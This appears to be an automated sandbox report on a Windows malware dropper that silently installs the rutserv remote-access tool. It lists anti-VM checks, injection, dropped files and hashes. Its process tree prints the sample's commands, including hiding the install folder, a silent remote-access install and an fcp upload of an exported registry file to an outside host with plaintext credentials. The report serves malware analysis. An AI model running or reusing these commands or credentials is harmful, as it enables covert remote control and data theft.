Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows11-21h2_x64 -
resource
win11-20250502-en -
resource tags
arch:x64arch:x86image:win11-20250502-enlocale:en-usos:windows11-21h2-x64system -
submitted
20/05/2025, 14:06
Static task
static1
Behavioral task
behavioral1
Sample
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Resource
win11-20250502-en
General
-
Target
2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
-
Size
9.1MB
-
MD5
5626d4dd5d06b612402dc73b85243a7d
-
SHA1
4111fa3b9fb47fc1fecad64e7b439251b89b724e
-
SHA256
a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
-
SHA512
03b5f6f84dab5a384003cdf8fad17c6c4214276f871e673352939514bd0120dda24cb644fcc0a76060d82d6d7e69f8822471e18ef2d2acd170f258aabb1a366b
-
SSDEEP
196608:iXKLL3IgcLx6WYo7JuSRZexCi/lk6/iljv4LX7XobiyUe/i/fnaDx:vL4pljJb+xCAlql74zjozR/iXo
Malware Config
Signatures
-
Rms family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rfusclient.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rutserv.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4876 attrib.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x001a00000002b04f-178.dat acprotect behavioral2/files/0x001b00000002b04c-177.dat acprotect -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rutserv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rfusclient.exe -
Executes dropped EXE 13 IoCs
pid Process 4448 123.exe 4472 rCceQHavD.exe 2300 rutserv.exe 5116 wVJxOQKKa.exe 1968 rutserv.exe 2372 wVJxOQKKa.exe 2180 rutserv.exe 5320 rutserv.exe 5432 rfusclient.exe 5304 rfusclient.exe 2464 id.exe 3032 rfusclient.exe 5148 fcp.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine rutserv.exe Key opened \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine rutserv.exe Key opened \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine rfusclient.exe Key opened \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine rfusclient.exe Key opened \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine rutserv.exe -
Loads dropped DLL 1 IoCs
pid Process 5148 fcp.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2300 rutserv.exe 1968 rutserv.exe 2180 rutserv.exe 5320 rutserv.exe 5432 rfusclient.exe 5304 rfusclient.exe 3032 rfusclient.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4472 set thread context of 3752 4472 rCceQHavD.exe 93 PID 5116 set thread context of 2372 5116 wVJxOQKKa.exe 97 -
resource yara_rule behavioral2/files/0x001a00000002b04f-178.dat upx behavioral2/files/0x001b00000002b04c-177.dat upx -
Drops file in Program Files directory 25 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\System\rutserv.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System attrib.exe File opened for modification C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.exe 123.exe File created C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.ini 123.exe File opened for modification C:\Program Files (x86)\System 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240619671 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\vp8decoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\vp8decoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\vp8encoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\regedit.reg 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\regedit.reg 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\install.bat 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\vp8encoder.dll 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\id.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\rfusclient.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\rfusclient.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\123.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\install.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\install.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\test.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\id.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\install.bat 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\123.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File opened for modification C:\Program Files (x86)\System\test.vbs 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe File created C:\Program Files (x86)\System\rutserv.exe 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rCceQHavD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language id.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fcp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wVJxOQKKa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rutserv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wVJxOQKKa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rfusclient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2404 timeout.exe 5092 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 2840 taskkill.exe 4332 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings id.exe -
Runs .reg file with regedit 2 IoCs
pid Process 2212 regedit.exe 3580 regedit.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 4472 rCceQHavD.exe 4472 rCceQHavD.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 2300 rutserv.exe 1968 rutserv.exe 1968 rutserv.exe 1968 rutserv.exe 1968 rutserv.exe 2180 rutserv.exe 2180 rutserv.exe 2180 rutserv.exe 2180 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5320 rutserv.exe 5432 rfusclient.exe 5432 rfusclient.exe 5304 rfusclient.exe 5304 rfusclient.exe 5304 rfusclient.exe 5304 rfusclient.exe 3032 rfusclient.exe 3032 rfusclient.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 3032 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 2840 taskkill.exe Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 4472 rCceQHavD.exe Token: SeDebugPrivilege 2300 rutserv.exe Token: SeDebugPrivilege 5116 wVJxOQKKa.exe Token: SeDebugPrivilege 2180 rutserv.exe Token: SeTakeOwnershipPrivilege 5320 rutserv.exe Token: SeTcbPrivilege 5320 rutserv.exe Token: SeTcbPrivilege 5320 rutserv.exe Token: SeDebugPrivilege 2372 wVJxOQKKa.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2300 rutserv.exe 1968 rutserv.exe 2180 rutserv.exe 5320 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2164 wrote to memory of 3132 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 78 PID 2164 wrote to memory of 3132 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 78 PID 2164 wrote to memory of 3132 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 78 PID 2164 wrote to memory of 676 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 79 PID 2164 wrote to memory of 676 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 79 PID 2164 wrote to memory of 676 2164 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe 79 PID 676 wrote to memory of 4448 676 WScript.exe 80 PID 676 wrote to memory of 4448 676 WScript.exe 80 PID 676 wrote to memory of 4448 676 WScript.exe 80 PID 3132 wrote to memory of 3888 3132 WScript.exe 81 PID 3132 wrote to memory of 3888 3132 WScript.exe 81 PID 3132 wrote to memory of 3888 3132 WScript.exe 81 PID 3888 wrote to memory of 4876 3888 cmd.exe 83 PID 3888 wrote to memory of 4876 3888 cmd.exe 83 PID 3888 wrote to memory of 4876 3888 cmd.exe 83 PID 3888 wrote to memory of 2840 3888 cmd.exe 84 PID 3888 wrote to memory of 2840 3888 cmd.exe 84 PID 3888 wrote to memory of 2840 3888 cmd.exe 84 PID 4448 wrote to memory of 4472 4448 123.exe 86 PID 4448 wrote to memory of 4472 4448 123.exe 86 PID 4448 wrote to memory of 4472 4448 123.exe 86 PID 3888 wrote to memory of 4332 3888 cmd.exe 87 PID 3888 wrote to memory of 4332 3888 cmd.exe 87 PID 3888 wrote to memory of 4332 3888 cmd.exe 87 PID 3888 wrote to memory of 4628 3888 cmd.exe 88 PID 3888 wrote to memory of 4628 3888 cmd.exe 88 PID 3888 wrote to memory of 4628 3888 cmd.exe 88 PID 3888 wrote to memory of 2212 3888 cmd.exe 89 PID 3888 wrote to memory of 2212 3888 cmd.exe 89 PID 3888 wrote to memory of 2212 3888 cmd.exe 89 PID 3888 wrote to memory of 2404 3888 cmd.exe 90 PID 3888 wrote to memory of 2404 3888 cmd.exe 90 PID 3888 wrote to memory of 2404 3888 cmd.exe 90 PID 4472 wrote to memory of 1284 4472 rCceQHavD.exe 92 PID 4472 wrote to memory of 1284 4472 rCceQHavD.exe 92 PID 4472 wrote to memory of 1284 4472 rCceQHavD.exe 92 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 4472 wrote to memory of 3752 4472 rCceQHavD.exe 93 PID 3888 wrote to memory of 2300 3888 cmd.exe 94 PID 3888 wrote to memory of 2300 3888 cmd.exe 94 PID 3888 wrote to memory of 2300 3888 cmd.exe 94 PID 4448 wrote to memory of 5116 4448 123.exe 95 PID 4448 wrote to memory of 5116 4448 123.exe 95 PID 4448 wrote to memory of 5116 4448 123.exe 95 PID 3888 wrote to memory of 1968 3888 cmd.exe 96 PID 3888 wrote to memory of 1968 3888 cmd.exe 96 PID 3888 wrote to memory of 1968 3888 cmd.exe 96 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 5116 wrote to memory of 2372 5116 wVJxOQKKa.exe 97 PID 3888 wrote to memory of 2180 3888 cmd.exe 98 PID 3888 wrote to memory of 2180 3888 cmd.exe 98 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4876 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files (x86)\System"4⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
- System Location Discovery: System Language Discovery
PID:4628
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:2212
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2404
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /silentinstall4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2300
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /firewall4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1968
-
-
C:\Program Files (x86)\System\rutserv.exerutserv.exe /start4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2180
-
-
C:\Windows\SysWOW64\timeout.exetimeout 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5092
-
-
C:\Windows\SysWOW64\regedit.exeregedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:3580
-
-
-
C:\Program Files (x86)\System\id.exe"C:\Program Files (x86)\System\id.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2464 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"4⤵
- System Location Discovery: System Language Discovery
PID:1792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\fcp.exefcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5148
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Program Files (x86)\System\123.exe"C:\Program Files (x86)\System\123.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"5⤵PID:1284
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
-
-
C:\Program Files (x86)\System\rutserv.exe"C:\Program Files (x86)\System\rutserv.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5320 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5304 -
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
PID:3032
-
-
-
C:\Program Files (x86)\System\rfusclient.exe"C:\Program Files (x86)\System\rfusclient.exe" /tray2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5432
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD53b084c7f7c666af58971760174c8f32b
SHA1b9a21429c6d35abf31eae7235dd3152beaf270fb
SHA2563bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96
SHA512d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c
-
Filesize
388KB
MD5ba67693705f46b37b4f7d427d874d2bb
SHA1502546afcab6bf7595d98cded71007ca60c340da
SHA256f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862
SHA5122258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea
-
Filesize
4KB
MD5cf76cadc2887b23aab4f1f2330968548
SHA1f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9
SHA256d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef
SHA51205ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7
-
Filesize
162B
MD5316840cd95d80c8c879e0812a39e8151
SHA16b1b804219c028c18311dd5c273b0cc3730c8044
SHA2564631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34
SHA5122295924c9a98fe19432df62503ddd18afb2c0af16168a8c276be4c3cf08ce1d98f1441e0a2a9d0ad68c4f3d843de00084a2303cd268791f25ce25a12d9b90036
-
Filesize
11KB
MD5fd06d4b501d310100f720d34ce0f7f2a
SHA14a0fedfda6a84c4e1ac6130a837a136947a82dd1
SHA25627997b89ef17f13a84c26cc3a3f7b4b1c6fc782f7257de05fcb204819897d8a3
SHA5129c6e0f09b490ee6b39f8ecd8df1058c5986295148c513a52cdc67da098ee72120db1c7ebc3ca864c7c3dd7ffb196bc2b5289ae06806db2e888dfa5788bf5ed91
-
Filesize
3.3MB
MD5e96a511519df1055c9b564646a752b2d
SHA1e75b47954faf9ddd643b23110deca10164f571a0
